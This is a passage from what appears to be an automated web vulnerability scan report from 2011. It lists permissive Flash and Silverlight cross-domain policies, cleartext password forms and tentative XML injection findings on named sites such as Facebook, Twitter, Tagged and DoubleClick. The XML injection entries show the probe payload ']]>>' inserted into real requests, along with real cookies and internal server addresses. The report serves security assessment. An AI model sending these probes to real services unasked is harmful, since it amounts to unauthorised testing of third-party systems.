<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.39. https://secure-static.tagged.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure-static.tagged.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-static.tagged.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:39:50 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:13:44 GMT
ETag: "7f6b18-1d7-49f3cc2ecde00"
Accept-Ranges: bytes
Content-Length: 471
Cache-Control: max-age=2592000
Expires: Tue, 14 Jun 2011 18:39:50 GMT
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.tagstat.com" />
<allow-access-from domain="*.tagged.com" />
...[SNIP]...

5.40. http://secure.tagged.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://secure.tagged.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.tagged.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:39:37 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:12:27 GMT
ETag: "1e6f19-15d-49f3cbe55f0c0"
Accept-Ranges: bytes
Content-Length: 349
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.tagstat.com"/>
...[SNIP]...

5.41. https://secure.tagged.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.tagged.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:36:00 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:12:27 GMT
ETag: "1e6f19-15d-49f3cbe55f0c0"
Accept-Ranges: bytes
Content-Length: 349
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.tagstat.com"/>
...[SNIP]...

5.42. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.42.245.35
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

5.43. http://www.tagged.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tagged.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:35:30 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 16:12:27 GMT
ETag: "1e6f19-15d-49f3cbe55f0c0"
Accept-Ranges: bytes
Content-Length: 349
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.tagstat.com"/>
...[SNIP]...

5.44. http://www.orcon.net.nz/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orcon.net.nz
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.orcon.net.nz

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:23:00 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11
Last-Modified: Wed, 05 Aug 2009 03:37:16 GMT
ETag: "174003-104-4705cb82b7300"
Accept-Ranges: bytes
Content-Length: 260
Vary: Accept-Encoding
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="test.orcon.net.nz" />
<allow-access-from domain="internal.orcon.net.nz" />
<allow-access-from domain="orcon.dev" /> <!-- Ga
...[SNIP]...

6. Silverlight cross-domain policy  previous  next
There are 5 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sun, 15 May 2011 18:35:46 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://ads.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:121c"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Sun, 15 May 2011 18:35:47 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

6.3. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 16 May 2011 18:23:54 GMT
Date: Sun, 15 May 2011 18:23:54 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

6.4. http://player.ooyala.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: player.ooyala.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 25 Apr 2011 02:53:37 GMT
Content-Type: text/xml
Date: Sun, 15 May 2011 18:38:16 GMT
Content-Length: 362
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-methods="*" http-request-headers="*">
<domain uri="*"/>
</allow-fr
...[SNIP]...

6.5. http://speed.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 18:35:48 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

7. Cleartext submission of password  previous  next
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


7.1. http://webmail.vtr.net/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmail.vtr.net
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: webmail.vtr.net
Proxy-Connection: keep-alive
Referer: http://vtr.com/vtr.com/concursos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 17647
Connection: keep-alive
Date: Sun, 15 May 2011 18:24:56 GMT
Content-Type: text/html;charset=iso-8859-1
Server: CommuniGatePro/5.1.16

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Webmail VTR</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link href="http://vtr.com/css/vtrHome2008.
...[SNIP]...
<td colspan="2" class="BgCaja" background="http://vtr.com/cgp/images/bg_caja.jpg">
    <FORM name="f1" method=post enctype="multipart/form-data" action="/" onsubmit="return conc1()">
        <INPUT type=hidden name="FormCharset" value="iso-8859-1">
...[SNIP]...
<td height="20">
           <INPUT NAME="Password" Type=password class="input" size=10 MaxLength=99 ALT="Contrase.a">
</td>
...[SNIP]...

7.2. http://webmail.vtr.net/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmail.vtr.net
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: webmail.vtr.net
Proxy-Connection: keep-alive
Referer: http://vtr.com/vtr.com/concursos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 17647
Connection: keep-alive
Date: Sun, 15 May 2011 18:24:56 GMT
Content-Type: text/html;charset=iso-8859-1
Server: CommuniGatePro/5.1.16

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Webmail VTR</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link href="http://vtr.com/css/vtrHome2008.
...[SNIP]...
<td colspan="2" align="left" valign="top" class="BgCaja" background="http://vtr.com/cgp/images/bg_caja.jpg">
    <FORM name="f2" method=post enctype="multipart/form-data" action="/" onSubmit="return conc2()">
        <INPUT type=hidden name="FormCharset" value="iso-8859-1">
...[SNIP]...
<td height="20">
<INPUT class="input" NAME="Password" Type=password size=10 MaxLength=99 ALT="Contrase.a">
</td>
...[SNIP]...

7.3. http://www.kol.co.nz/account.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kol.co.nz
Path:   /account.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /account.php HTTP/1.1
Host: www.kol.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11577963.1305480320.1.1.utmcsr=orcon.net.nz|utmccn=(referral)|utmcmd=referral|utmcct=/about/browse/category/acquisitions/; __utma=11577963.112339897.1305480320.1305480320.1305480320.1; __utmc=11577963; __utmb=11577963.1.10.1305480320;

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:38:33 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Length: 7464
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<!-- Dial-up Login -->
           <form method="post" action="http://accounts.kol.co.nz/customers/login.asp?return=index.asp" class="d_box">
               <h3>
...[SNIP]...
<span class="element"><input type="password" name="password" id="dupassword" /></span>
...[SNIP]...

7.4. http://www.kol.co.nz/payment/credit.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kol.co.nz
Path:   /payment/credit.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /payment/credit.php HTTP/1.1
Host: www.kol.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11577963.1305480320.1.1.utmcsr=orcon.net.nz|utmccn=(referral)|utmcmd=referral|utmcct=/about/browse/category/acquisitions/; __utma=11577963.112339897.1305480320.1305480320.1305480320.1; __utmc=11577963; __utmb=11577963.1.10.1305480320;

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:38:44 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Length: 6420
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<!-- Account Login -->
                   <form method="post" action="http://accounts.kol.co.nz/customers/login.asp?return=index.asp" class="box">
                   
                       <div class="boxcontent">
...[SNIP]...
<span class="element"><input type="password" name="password" id="dupassword" /></span>
...[SNIP]...

7.5. http://www.kol.co.nz/webmail.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kol.co.nz
Path:   /webmail.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /webmail.php HTTP/1.1
Host: www.kol.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11577963.1305480320.1.1.utmcsr=orcon.net.nz|utmccn=(referral)|utmcmd=referral|utmcct=/about/browse/category/acquisitions/; __utma=11577963.112339897.1305480320.1305480320.1305480320.1; __utmc=11577963; __utmb=11577963.1.10.1305480320;

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:38:33 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Length: 5157
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<!-- Webmail Login -->
               <form method="post" action="http://accounts.kol.co.nz/customers/login.asp?return=index.asp" class="box">

                   <div class="boxcontent">
...[SNIP]...
<span class="element"><input type="password" name="password" id="dupassword" /></span>
...[SNIP]...

8. XML injection  previous  next
There are 94 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


8.1. http://api.facebook.com/restserver.php [format parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Ftweetbeat.com%22%5D&format=json]]>>&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 15 May 2011 13:06:12 -0700
Pragma:
X-FB-Rev: 378427
X-FB-Server: 10.42.67.33
X-Cnection: close
Date: Sun, 15 May 2011 20:04:12 GMT
Content-Length: 738

fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

8.2. http://platform.twitter.com/anywhere.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /anywhere.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /anywhere.js]]>>?id=YAOsk5VXuUFZdZMx60TxFw&v=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 280
Date: Sun, 15 May 2011 20:01:18 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>anywhere.js]]&gt;&gt;</Key><RequestId>3EDCD4B7EBABA582</RequestId><HostId>K
...[SNIP]...

8.3. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform0.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/tweet_button.html?_=1305489673664&count=horizontal&lang=en&text=The%20Pulse%20of%20Social%20Life%20-%20Live%20tweets&url=http%3A%2F%2Ftweetbeat.com HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Sun, 15 May 2011 20:01:35 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/tweet_button.html</Key><RequestId>739FBFE2E464E540</Reque
...[SNIP]...

8.4. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform0.twitter.com
Path:   /widgets/tweet_button.html

Issue detail

